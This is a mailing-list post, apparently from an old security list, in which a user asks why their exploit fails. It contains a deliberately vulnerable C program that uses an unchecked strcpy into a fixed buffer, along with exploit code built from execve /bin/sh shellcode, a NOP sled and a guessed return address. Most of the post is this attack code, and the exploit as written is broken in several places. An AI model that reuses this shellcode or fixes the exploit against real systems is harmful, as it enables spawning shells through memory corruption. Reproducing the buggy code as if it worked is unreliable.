[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Why doesnt work?



Hi! Im trying 2 xploit a little code:
-----------------------------------------------------------
// foo.c, vuln proggy
// compile gcc -o foo foo.c
//
#include <stdio.h>
#include <string.h> main (int argc,char **argv){ char buffer[1024];
if (!argc) {
   fprintf(stdout,"No argument found.");
   exit(-1);
} strcpy(buffer,argv[1]); } ------------------------------------------------------------------------- We see,if argv[1]>1024, It will generate a segmentation fault,it isnt? So,here the exploit code:
// Exploit code 4 foo.c
//
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h> #define NOP 0x90 main (void) {
char buffer[1032]; /* 1024 + 8 */
int offset,i,ret;
char *ptr,*ptr2;

char shellcode[]=
"\x31\xc0"                      // xorl         %eax,%eax
"\x50"                          // pushl        %eax
"\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e
"\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f
"\x89\xe3"                      // movl         %esp,%ebx
"\x99"                          // cltd
"\x52"                          // pushl        %edx
"\x53"                          // pushl        %ebx
"\x89\xe1"                      // movl         %esp,%ecx
"\xb0\x0b"                      // movb         $0xb,%al
"\xcd\x80"                      // int          $0x80
;
long get_sp(){
__asm__ ("movl %esp,%eax");
}
help () {
fprintf ("Usage: %s <offset>\n",argv[0]);
exit(0);
}
if (!argc)
help(); offset=atoi(argv[1]);
for (i=0;i<strlen(buffer);i++) {
  buffer[i]=0x00;
} ptr=buffer;
for (i=0;i<(strlen(buffer)-strlen(shellcode));i++) {
                      *(ptr++)=NOP;
                                  }
  for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
             }
  ptr2=(long *)ptr;

  for(i=0;i<8;i++) {
      *(ptr2++)=get_sp()+offset;
                }
execl("./foo", "foo",buffer,0);
} //EOF
--------------------------------------------------------
This exploit doesnt work,can you help me? why it doesnt work? ARggg!!!
Sorry 4 my poor english.
Greetings from spain!